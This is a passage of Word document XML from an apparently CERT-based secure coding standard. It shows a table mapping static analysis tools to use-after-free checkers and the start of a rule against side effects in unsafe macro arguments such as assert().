        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD039E7" w14:textId="05E57E2B" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId79" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E4A1647" w14:textId="5B317ED0" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4586F3" w14:textId="283E65A7" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pP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t>UFM.USE.MIGHT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UFM.USE.MUST </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2556D426" w14:textId="7CCE8271" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="03937464" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="699288A5" w14:textId="5A26A1FF" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId80" w:history="1">
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CC1B88D" w14:textId="77777777" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:divId w:val="1779593253"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>9.7.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35911E79" w14:textId="2ED1EA5E" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4ADD74" w14:textId="41E6782D" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>483 S, 484 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221E6849" w14:textId="438B52EC" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Partially implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B3C2D" w14:paraId="433579AD" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE4D8D3" w14:textId="7361A205" w:rsidR="005B3C2D" w:rsidRDefault="00000000" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId81" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485EEED8" w14:textId="0030ED36" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFDA649" w14:textId="1EC1AE4D" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_CPP-MEM50-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E14C36" w14:textId="04D4AE2C" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Do not use resources that have been freed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B3C2D" w14:paraId="28B400B0" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5732CF64" w14:textId="6E2A88CD" w:rsidR="005B3C2D" w:rsidRDefault="00000000" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId82" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Insure++</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="534B1AA0" w14:textId="77777777" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03494A2A" w14:textId="77777777" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DAEDF29" w14:textId="70CF10DD" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Runtime detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B3C2D" w14:paraId="092940EA" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7589B551" w14:textId="319EA6DA" w:rsidR="005B3C2D" w:rsidRDefault="00000000" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId83" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFDCB9A" w14:textId="2B687DF8" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2978B16E" w14:textId="65013FEB" w:rsidR="005B3C2D" w:rsidRDefault="00000000" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId84" w:history="1">
              <w:r w:rsidR="005B3C2D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C++: MEM50-CPP</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5988A209" w14:textId="77777777" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2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69BD25D5" w14:textId="77777777" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">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Pointer access out of bounds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1861522B" w14:textId="77777777" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">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689A03C6" w14:textId="77777777" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">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previously freed pointer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163BA4AD" w14:textId="778FC00F" w:rsidR="005B3C2D" w:rsidRDefault="005B3C2D" w:rsidP="005B3C2D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Rule partially covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED34F6" w14:paraId="3DDBB0B2" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B2C100" w14:textId="58300B01" w:rsidR="00ED34F6" w:rsidRDefault="00000000" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId85" w:history="1">
              <w:r w:rsidR="00ED34F6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48A2E920" w14:textId="46231335" w:rsidR="00ED34F6" w:rsidRDefault="00ED34F6" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD65F72" w14:textId="4AA4BD08" w:rsidR="00ED34F6" w:rsidRDefault="00000000" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId86" w:history="1">
              <w:r w:rsidR="00ED34F6">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V586</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00ED34F6">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId87" w:history="1">
              <w:r w:rsidR="00ED34F6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V774</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="371864B1" w14:textId="77777777" w:rsidR="00ED34F6" w:rsidRDefault="00ED34F6" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED34F6" w14:paraId="41744220" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EAC101A" w14:textId="4955F5D8" w:rsidR="00ED34F6" w:rsidRDefault="00000000" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId88" w:history="1">
              <w:r w:rsidR="00ED34F6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Splint</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06459C99" w14:textId="77777777" w:rsidR="00ED34F6" w:rsidRDefault="00ED34F6" w:rsidP="00ED34F6">
            <w:pPr>
              <w:divId w:val="1522472271"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>5.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F266AC" w14:textId="37955A40" w:rsidR="00ED34F6" w:rsidRDefault="00ED34F6" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6359BB49" w14:textId="2745CB32" w:rsidR="00ED34F6" w:rsidRDefault="00ED34F6" w:rsidP="00ED34F6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0472C174" w14:textId="3B91138F" w:rsidR="00ED34F6" w:rsidRDefault="00ED34F6" w:rsidP="00ED34F6">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20" w:name="_Toc52464064"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Coding Standard 6</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2FEC82A9"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>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shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71ED323B" w14:textId="5D2F41E2" w:rsidR="00381847" w:rsidRDefault="005321D8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>PRE</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>031</w:t>
            </w:r>
            <w:r w:rsidR="00E769D9">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33ACFFEA" w14:textId="5E40B650" w:rsidR="00381847" w:rsidRDefault="0056667E">
            <w:r w:rsidRPr="0056667E">
              <w:t>Avoid side effects in arguments to unsafe macros</w:t>
            </w:r>
            <w:r w:rsidR="00EC4A42">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00EC4A42" w:rsidRPr="00EC4A42">
              <w:t>An unsafe function-like macro is one whose expansion results in evaluating one of its parameters more than once or not at all.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2229A95F"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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2722D3" w14:textId="77777777" w:rsidR="0056667E" w:rsidRDefault="0056667E" w:rsidP="0056667E">
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">) macro is a convenient mechanism for incorporating diagnostic tests in code. (See MSC11-C. Incorporate diagnostic tests using assertions.) Expressions used as arguments to the standard </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">) macro should not have side effects. The behavior of the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">) macro depends on the definition of the object-like macro NDEBUG. If the macro NDEBUG is undefined, the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>assert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) macro is defined to evaluate its expression argument and, if the result of the expression compares equal to 0, call the abort() function. If NDEBUG is defined, assert is defined to expand to ((void)0). Consequently, the expression in the assertion is not evaluated, and no side effects it may have had otherwise take place in non-debugging executions of the code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6FD797" w14:textId="77777777" w:rsidR="0056667E" w:rsidRDefault="0056667E" w:rsidP="0056667E"/>
          <w:p w14:paraId="40542A0F" w14:textId="1FAE74A7" w:rsidR="00F72634" w:rsidRDefault="0056667E" w:rsidP="0056667E">
            <w:r>
